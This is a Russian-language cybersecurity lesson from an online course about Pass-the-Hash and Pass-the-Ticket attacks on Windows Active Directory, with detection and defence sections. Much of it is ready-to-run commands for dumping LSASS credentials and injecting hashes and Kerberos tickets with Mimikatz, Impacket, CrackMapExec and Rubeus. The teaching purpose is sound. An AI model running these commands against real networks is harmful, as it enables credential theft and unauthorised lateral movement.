Атаки Pass-the-Hash и Pass-the-Ticket
Используйте хеши учётных данных и билеты Kerberos для бокового перемещения без знания паролей в открытом виде.
«Атаки Pass-the-Hash и Pass-the-Ticket» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Почему существуют эти атаки
Протоколы учетных данных Windows хранят секреты аутентификации (хеши NTLM и билеты Kerberos) в памяти. Злоумышленник с привилегиями SYSTEM может извлечь эти секреты и повторно использовать их для аутентификации от имени других пользователей, не зная паролей.
Извлечение хешей NTLM с помощью Mimikatz
Mimikatz — ведущий инструмент для извлечения учетных данных в Windows. Запущенный с правами SYSTEM или администратора, он читает память процесса LSASS, извлекая хеши NTLM и учетные данные в открытом виде.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samПередача хеша (PtH) с помощью Mimikatz
PtH внедряет хеш NTLM в новый сеанс, не требуя знания пароля в открытом виде. Хеш используется для аутентификации в удаленных службах по NTLM — это эффективно для горизонтального перемещения на другие узлы Windows.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userПередача хеша с помощью Impacket
Impacket предоставляет инструменты Python для передачи хеша: psexec.py, smbexec.py и wmiexec.py принимают хеши NTLM напрямую для удаленного выполнения команд.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cИзвлечение билетов Kerberos
Билеты Kerberos также хранятся в памяти LSASS. Mimikatz извлекает их, а Rubeus — специализированный инструмент для работы с билетами Kerberos в Windows.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtПередача билета (PtT)
PtT внедряет украденный билет Kerberos в текущий сеанс. Билет выполняет аутентификацию в службах от имени своего исходного владельца — хеш или пароль не требуются.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistУдаленное извлечение LSASS
Получив точку опоры, извлеките дамп LSASS удаленно с помощью CrackMapExec или secretsdump из Impacket — интерактивный сеанс на целевом узле не нужен.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Пути горизонтального перемещения
Получив хеши или билеты, перемещайтесь по сети горизонтально: используйте PtH для доступа к другим компьютерам при повторном использовании локальных учетных данных администратора, PtT — для доступа к службам домена, а затем повышайте привилегии до уровня администратора домена, атакуя привилегированные учетные записи.
Обнаружение PtH и PtT
Защитники выявляют PtH по следующим признакам: событие ID 4624 (вход в систему) с типом входа 3 и без соответствующего интерактивного входа, аномалии аутентификации NTLM и сигнатуры Mimikatz в памяти или на диске.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useМеры защиты
Основные меры защиты: включите Credential Guard (он защищает LSASS с помощью виртуализации), ограничьте повторное использование локальных учетных записей администратора на разных компьютерах с помощью LAPS, включите привилегированные учетные записи в группу «Защищенные пользователи» и отключите NTLM, где это возможно.
Переход от хеша к Kerberos
Переход от хеша к Kerberos преобразует хеш NTLM в TGT Kerberos. Это полезно в средах, где NTLM заблокирован, но доступен Kerberos, или когда TGT нужен для дальнейших атак на Kerberos.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Быстрая проверка
Какая функция безопасности Windows защищает хранилище учетных данных LSASS с помощью виртуализации?
Итоги: передача хеша и билета
Передача хеша и передача билета лежат в основе горизонтального перемещения в Active Directory. Обе атаки используют кэширование учетных данных Windows в LSASS. Mimikatz и Impacket делают извлечение и повторное использование учетных данных простыми. Защищайтесь с помощью Credential Guard, LAPS, группы «Защищенные пользователи» и строгого мониторинга событий аутентификации NTLM и Kerberos.
Часто задаваемые вопросы
Урок «Атаки Pass-the-Hash и Pass-the-Ticket» бесплатный?
Да — полный текст урока «Атаки Pass-the-Hash и Pass-the-Ticket» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Атаки Pass-the-Hash и Pass-the-Ticket»?
Используйте хеши учётных данных и билеты Kerberos для бокового перемещения без знания паролей в открытом виде. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.
Сколько времени занимает урок «Атаки Pass-the-Hash и Pass-the-Ticket»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Аутентификация Windows: NTLM и Kerberos
- Атаки Pass-the-Hash и Pass-the-Ticket
- Kerberoasting и AS-REP Roasting
- Защита Active Directory